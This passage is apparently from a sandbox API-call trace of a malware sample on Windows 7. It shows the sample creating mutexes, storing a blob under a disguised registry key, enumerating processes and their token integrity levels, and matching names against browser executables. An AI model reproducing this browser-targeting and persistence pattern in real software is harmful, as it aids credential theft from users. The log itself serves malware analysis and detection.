[0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="7B") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="41") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="9A") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="A8") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="1E") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="D4") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="8D") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="87") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="CE") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="C1") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="9C") returned 2 [0215.453] CreateEventW (lpEventAttributes=0x877e4, bManualReset=1, bInitialState=0, lpName="C342ED8F577B419AA81ED48D87CEC19C") returned 0x104 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="99") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="AB") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="C0") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="AC") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="EB") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="C9") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="54") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="12") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="B2") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="E5") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="32") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="10") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="6C") returned 2 [0215.453] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="BC") returned 2 [0215.454] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="13") returned 2 [0215.454] wvnsprintfW (in: pszDest=0x1af5f0, cchDest=3, pszFmt="%02X", arglist=0x1af5cc | out: pszDest="1F") returned 2 [0215.454] CreateEventW (lpEventAttributes=0x877e4, bManualReset=1, bInitialState=0, lpName="99ABC0ACEBC95412B2E532106CBC131F") returned 0x108 [0215.454] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7135f, lpParameter=0x265f870, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x10c [0215.454] CreateMutexW (lpMutexAttributes=0x877e4, bInitialOwner=0, lpName="ABC6B5B774FF9FD7F54EC277098C64EE") returned 0x110 [0215.454] WaitForSingleObject (hHandle=0x110, dwMilliseconds=0xffffffff) returned 0x0 [0215.454] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x1aec98 | out: phkResult=0x1aec98*=0x114) returned 0x0 [0215.455] RegQueryValueExW (in: hKey=0x114, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x1aecc4, lpData=0x0, lpcbData=0x1aecac*=0x0 | out: lpType=0x1aecc4*=0x3, lpData=0x0, lpcbData=0x1aecac*=0x6f0) returned 0x0 [0215.455] RegQueryValueExW (in: hKey=0x114, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x1aecc4, lpData=0x265f890, lpcbData=0x1aecac*=0x6f0 | out: lpType=0x1aecc4*=0x3, lpData=0x265f890*, lpcbData=0x1aecac*=0x6f0) returned 0x0 [0215.455] RegCloseKey (hKey=0x114) returned 0x0 [0215.455] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x1af6a8 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\") returned 0x25 [0215.455] PathCombineW (in: pszDest=0x1af296, pszDir="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", pszFile="xeyzlap" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\xeyzlap") returned="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\xeyzlap" [0215.455] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\xeyzlap" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\xeyzlap")) returned 0xffffffff [0215.455] PathCombineW (in: pszDest=0x1af49e, pszDir="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\", pszFile="giilemz" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\giilemz") returned="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\giilemz" [0215.455] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\giilemz" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\giilemz")) returned 0xffffffff [0215.455] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x1aecac, lpdwDisposition=0x0 | out: phkResult=0x1aecac*=0x114, lpdwDisposition=0x0) returned 0x0 [0215.455] RegSetValueExW (in: hKey=0x114, lpValueName="Baywkivyl", Reserved=0x0, dwType=0x3, lpData=0x265f8a8*, cbData=0x6f0 | out: lpData=0x265f8a8*) returned 0x0 [0215.455] RegCloseKey (hKey=0x114) returned 0x0 [0215.455] ReleaseMutex (hMutex=0x110) returned 1 [0215.455] CloseHandle (hObject=0x110) returned 1 [0215.455] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7c4a8, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x110 [0215.456] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x78f74, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x1af8a8 | out: lpThreadId=0x1af8a8*=0x96c) returned 0x114 [0215.457] CloseHandle (hObject=0x114) returned 1 Thread: id = 171 os_tid = 0xa88 Thread: id = 172 os_tid = 0x970 [0215.466] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0215.471] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0218.236] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77270000 [0218.236] GetProcAddress (hModule=0x77270000, lpProcName="NtQuerySystemInformation") returned 0x7728fda0 [0218.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x4bfd5c | out: SystemInformation=0x0, ResultLength=0x4bfd5c*=0xce40) returned 0xc0000004 [0218.236] VirtualAlloc (lpAddress=0x0, dwSize=0xde40, flAllocationType=0x1000, flProtect=0x4) returned 0x160000 [0218.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0xde40, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0218.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0218.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0218.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0218.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0218.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0218.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0218.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0218.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0218.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0218.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0218.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0218.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0218.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0218.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0218.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0218.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0218.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0218.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0218.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0218.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0218.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0218.237] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0xb4 [0218.237] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0218.237] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0218.237] GetLastError () returned 0x7a [0218.237] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265f890, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265f890, ReturnLength=0x4bfd0c) returned 1 [0218.237] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0218.237] CloseHandle (hObject=0xb8) returned 1 [0218.237] CloseHandle (hObject=0xb4) returned 1 [0218.238] GetLengthSid (pSid=0x265f898*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.238] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0xb4 [0218.238] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x4bfc9a, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.238] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0218.238] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0218.238] GetLastError () returned 0x7a [0218.238] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265f890, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265f890, ReturnLength=0x4bfd38) returned 1 [0218.238] GetSidSubAuthorityCount (pSid=0x265f898*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265f899 [0218.238] GetSidSubAuthority (pSid=0x265f898*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265f8a0 [0218.238] CloseHandle (hObject=0xb8) returned 1 [0218.238] CloseHandle (hObject=0xb4) returned 1 [0218.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x265f8b0, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0218.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x265f8b0, cbMultiByte=11, lpWideCharStr=0x265f8c8, cchWideChar=12 | out: lpWideCharStr="firefox.exe") returned 11 [0218.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x265f910, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0218.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x265f910, cbMultiByte=10, lpWideCharStr=0x265f928, cchWideChar=11 | out: lpWideCharStr="chrome.exe") returned 10 [0218.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x265f970, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0218.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x265f970, cbMultiByte=9, lpWideCharStr=0x265f988, cchWideChar=10 | out: lpWideCharStr="opera.exe") returned 9 [0218.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x265f9c8, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0218.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x265f9c8, cbMultiByte=12, lpWideCharStr=0x265f9e8, cchWideChar=13 | out: lpWideCharStr="iexplore.exe") returned 12 [0218.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x265fa30, cbMultiByte=17, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0218.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x265fa30, cbMultiByte=17, lpWideCharStr=0x265fa50, cchWideChar=18 | out: lpWideCharStr="MicrosoftEdge.exe") returned 17 [0218.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x265faa0, cbMultiByte=19, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19 [0218.238] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x265faa0, cbMultiByte=19, lpWideCharStr=0x265fac0, cchWideChar=20 | out: lpWideCharStr="MicrosoftEdgeCP.exe") returned 19 [0218.238] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0218.239] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0218.239] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0218.239] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0218.239] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0218.239] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0218.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xb4 [0218.239] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0218.239] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0218.239] GetLastError () returned 0x7a [0218.239] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0218.239] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0218.239] CloseHandle (hObject=0xb8) returned 1 [0218.239] CloseHandle (hObject=0xb4) returned 1 [0218.239] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.239] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xb4 [0218.239] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1660c8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.239] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0218.239] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0218.239] GetLastError () returned 0x7a [0218.239] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0218.239] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0218.239] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0218.239] CloseHandle (hObject=0xb8) returned 1 [0218.239] CloseHandle (hObject=0xb4) returned 1 [0218.239] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0218.239] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0218.240] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0218.240] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0218.240] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0218.240] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0218.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0xb4 [0218.240] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0218.240] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0218.240] GetLastError () returned 0x7a [0218.240] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0218.240] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0218.240] CloseHandle (hObject=0xb8) returned 1 [0218.240] CloseHandle (hObject=0xb4) returned 1 [0218.240] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0xb4 [0218.240] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1662a0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.240] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0218.240] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0218.240] GetLastError () returned 0x7a [0218.240] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0218.240] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0218.240] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0218.240] CloseHandle (hObject=0xb8) returned 1 [0218.240] CloseHandle (hObject=0xb4) returned 1 [0218.240] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0218.240] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0218.240] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0218.240] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0218.240] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0218.240] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0218.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0218.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0218.240] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0218.240] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0218.240] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0218.240] GetLastError () returned 0x7a [0218.241] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0218.241] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0218.241] CloseHandle (hObject=0xb8) returned 1 [0218.241] CloseHandle (hObject=0xb4) returned 1 [0218.241] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.241] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0xb4 [0218.241] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166928, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.241] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0218.241] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0218.241] GetLastError () returned 0x7a [0218.241] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0218.241] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0218.241] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0218.241] CloseHandle (hObject=0xb8) returned 1 [0218.241] CloseHandle (hObject=0xb4) returned 1 [0218.241] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0218.241] lstrcmpiW (lpString1="chrome.exe", 